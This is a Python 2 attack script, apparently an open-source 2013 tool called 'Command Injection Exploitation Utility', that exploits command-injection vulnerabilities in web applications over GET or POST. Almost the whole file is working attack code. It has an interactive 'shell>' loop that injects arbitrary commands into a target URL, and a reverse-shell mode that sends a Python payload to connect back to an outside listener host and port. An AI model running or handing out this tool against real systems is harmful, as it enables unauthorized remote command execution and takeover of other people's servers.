we.py

#!/usr/bin/python
# Command Injection Exploitation Utility
# Exploits POST and GET command injections
# version: 0.1
# Mad props to @LaNMaSteR53 for rce.py which this is based on
# @info_dox | insecurety.net
import sys
import urllib
import re
import urlparse
import requests
import argparse
import payloads 
from payloads.all import *

def banner():
    print "      Command Injection Exploitation Utility"
    print "For exploitation of command execution vulnerabilities"
    print "    Insecurety Research - 2013 - insecurety.net"

def inject(base_url, payload, method):
    url = base_url.replace('<rce>', payload)
    if method == "post":
        (ignore, ignore, ignore, params, ignore) = urlparse.urlsplit(url)
        site = url[:url.find(params)-1]
        result = requests.post(site, params)
    else:
        result = requests.get(url)
    try:
        result = re.sub("<\/*\w+?>", '', result.text)
    except Exception:
        pass
    print '[*] Executed: %s\n%s' % (payload, result)

def inlineshell(base_url, method):
    while True:
        cmd = raw_input("shell> ")
        if cmd.lower() == 'exit':
            sys.exit(2)
        else:
            payload = cmd
            inject(base_url, payload, method)

def revshell(base_url, method, lhost, lport):
    payload = payloads.python.reverse(lhost, lport)
    print "[+] Doing a reverse shell!"
    print "[*] LHOST: %s" %(lhost)
    print "[*] LPORT: %s" %(lport)
    print "[!] Hope your listener is listening"
    inject(base_url, payload, method)


help = banner()

parser = argparse.ArgumentParser(description=help)
parser.add_argument("--url", help="url, like http://localhost/vulnpage?vuln=<rce>&safe=whatever, if POST, format it like a GET and use --method=post so parser can deal with it", required=True)
parser.add_argument("--method", help="post or get", default="get")
parser.add_argument("--shell", help="inline shell (inline) or reverse shell (reverse)", default="inline")
parser.add_argument("--lhost", help="Listener host IP for reverse shell", default="127.0.0.1")
parser.add_argument("--lport", help="Listener port for the reverse shell", default="4444")
args = parser.parse_args()

base_url = args.url
method = args.method
shell = args.shell
lhost = args.lhost
lport = args.lport

def main():
    if shell == "inline":
        inlineshell(base_url, method)
    elif shell == "reverse":
        revshell(base_url, method, lhost, lport)
    else:
        print "[-] YOU FAIL IT!"
        print "YOUR ARGUMENTS WERE INVALID!"
        sys.exit(0)

main()